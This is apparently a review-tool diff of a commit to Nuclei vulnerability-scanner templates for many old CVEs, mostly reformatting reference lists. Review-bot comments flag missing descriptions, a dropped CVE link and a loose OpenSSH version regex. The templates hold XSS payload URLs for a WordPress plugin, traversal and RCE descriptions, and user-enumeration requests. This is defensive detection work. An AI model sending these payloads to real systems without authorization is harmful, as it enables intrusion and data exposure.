# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
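Review bot: Four commented-out `path:` entries are carried forward under the single active path, and the old and new sides of this hunk read identically as shown, so the change appears to be whitespace only. Dead entries in a template are easy to mistake for active checks during review; suggest either deleting them or adding a one-line comment saying why they are disabled.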
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/37129
|
- https://www.exploit-db.com/exploits/37129
|
||||||
- https://www.cvedetails.com/cve/CVE-2012-4253
|
- https://www.cvedetails.com/cve/CVE-2012-4253
|
||||||
tags: cve,cve2012,lfi
|
tags: cve,cve2012,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/37034
|
- https://www.exploit-db.com/exploits/37034
|
||||||
- https://www.cvedetails.com/cve/CVE-2012-4878
|
- https://www.cvedetails.com/cve/CVE-2012-4878
|
||||||
tags: cve,cve2012,lfi
|
tags: cve,cve2012,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.securityfocus.com/bid/52841/info
|
- https://www.securityfocus.com/bid/52841/info
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
|
||||||
tags: cve,cve2012,xss,manageengine
|
tags: cve,cve2012,xss,manageengine
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
|
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/26955
|
- https://www.exploit-db.com/exploits/26955
|
||||||
- https://www.cvedetails.com/cve/CVE-2013-5979
|
- https://www.cvedetails.com/cve/CVE-2013-5979
|
||||||
- https://bugs.launchpad.net/xibo/+bug/1093967
|
- https://bugs.launchpad.net/xibo/+bug/1093967
|
||||||
|
|
|
@ -5,9 +5,9 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/38936
|
- https://www.exploit-db.com/exploits/38936
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
|
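Review bot: The info block in this hunk goes from `severity: medium` straight to `reference:` with no `description:` field, unlike the templates at the `-5,7` hunks in this commit. Suggest adding a short description so that the finding is understandable without following the reference links. The other `-4,7` hunks shown here have the same gap.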
@ -4,7 +4,7 @@ info:
|
||||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/39287
|
- https://www.exploit-db.com/exploits/39287
|
||||||
- https://www.cvedetails.com/cve/CVE-2014-5368
|
- https://www.cvedetails.com/cve/CVE-2014-5368
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/35346
|
- https://www.exploit-db.com/exploits/35346
|
||||||
- https://www.cvedetails.com/cve/CVE-2014-8799
|
- https://www.cvedetails.com/cve/CVE-2014-8799
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
|
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WordPress Plugin RobotCPA 5 - Directory Traversal
|
name: WordPress Plugin RobotCPA 5 - Directory Traversal
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
reference: |
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
|
||||||
- https://www.exploit-db.com/exploits/37252
|
- https://www.exploit-db.com/exploits/37252
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
|
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
|
||||||
reference: |
|
reference:
|
||||||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
||||||
- https://wordpress.org/plugins/anti-plagiarism
|
- https://wordpress.org/plugins/anti-plagiarism
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
|
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||||
|
|
|
@ -5,7 +5,9 @@ info:
|
||||||
author: daffainfo,0x240x23elu
|
author: daffainfo,0x240x23elu
|
||||||
severity: high
|
severity: high
|
||||||
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
|
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2016080220
|
||||||
|
- https://wpvulndb.com/vulnerabilities/8609
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,lfi
|
tags: cve,cve2016,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
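Review bot: the new reference list drops the cve.mitre.org link for CVE-2016-10956 that the old single-line `reference:` carried, so the template no longer links to any CVE record. Keep it (or an NVD link, as other templates in this commit use) as a third list entry next to the cxsecurity.com and wpvulndb.com links.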
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: critical
|
severity: critical
|
||||||
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
||||||
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
||||||
tags: cve,cve2016,wordpress,wp-theme,xss
|
tags: cve,cve2016,wordpress,wp-theme,xss
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
|
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
|
||||||
reference: |
|
reference:
|
||||||
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
||||||
- https://www.cvedetails.com/cve/CVE-2016-2389
|
- https://www.cvedetails.com/cve/CVE-2016-2389
|
||||||
tags: cve,cve2016,lfi,sap
|
tags: cve,cve2016,lfi,sap
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/44054
|
- https://www.exploit-db.com/exploits/44054
|
||||||
- https://www.cvedetails.com/cve/CVE-2017-15647
|
- https://www.cvedetails.com/cve/CVE-2017-15647
|
||||||
tags: cve,cve2017,lfi,router
|
tags: cve,cve2017,lfi,router
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
||||||
tags: cve,cve2017,wordpress,xss,wp-plugin
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
|
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
|
||||||
tags: cve,cve2017,wordpress
|
tags: cve,cve2017,wordpress
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
|
||||||
- https://www.exploit-db.com/exploits/41497
|
- https://www.exploit-db.com/exploits/41497
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -16,6 +16,7 @@ requests:
|
||||||
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
||||||
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
@ -33,8 +34,9 @@ requests:
|
||||||
- '"name":'
|
- '"name":'
|
||||||
- '"avatar_urls":'
|
- '"avatar_urls":'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '"name":"[^"]*"'
|
- '"name":"[^"]*"'
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/45678
|
- https://www.exploit-db.com/exploits/45678
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
||||||
tags: cve,cve2018,lfi,router,dlink
|
tags: cve,cve2018,lfi,router,dlink
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
||||||
reference: |
|
reference:
|
||||||
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
||||||
- https://www.exploit-db.com/exploits/48614
|
- https://www.exploit-db.com/exploits/48614
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: CVE-2018-15473
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenSSH Username Enumeration
|
||||||
|
author: r3dg33k,daffainfo
|
||||||
|
severity: low
|
||||||
|
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
|
||||||
|
tags: network,openssh,cve,cve2018
|
||||||
|
|
||||||
|
network:
|
||||||
|
- host:
|
||||||
|
- "{{Hostname}}"
|
||||||
|
- "{{Hostname}}:22"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- 'SSH-2.0-OpenSSH_[1-7].*'
|
|
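Review bot: the only matcher, `SSH-2.0-OpenSSH_[1-7].*`, tests the first version digit alone, so it also fires on 7.8 and 7.9 banners although the description limits the issue to "OpenSSH through 7.7", and it cannot tell a build with a backported fix from an unpatched one. Narrow the regex to the affected version range and say in the description that this is a banner-based version check rather than a confirmation that enumeration works.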
@ -4,9 +4,9 @@ info:
|
||||||
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
||||||
- https://www.exploit-db.com/exploits/45342
|
- https://www.exploit-db.com/exploits/45342
|
||||||
tags: cve,cve2018,iot,lfi
|
tags: cve,cve2018,iot,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
|
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/45440
|
- https://www.exploit-db.com/exploits/45440
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-16288
|
- https://www.cvedetails.com/cve/CVE-2018-16288
|
||||||
tags: cve,cve2018,lfi
|
tags: cve,cve2018,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
|
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/45780
|
- https://www.exploit-db.com/exploits/45780
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-19458
|
- https://www.cvedetails.com/cve/CVE-2018-19458
|
||||||
tags: cve,cve2018,lfi
|
tags: cve,cve2018,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
||||||
reference: |
|
reference:
|
||||||
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
||||||
- https://www.cvedetails.com/cve/CVE-2018-20470
|
- https://www.cvedetails.com/cve/CVE-2018-20470
|
||||||
tags: cve,cve2018,lfi
|
tags: cve,cve2018,lfi
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
|
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
|
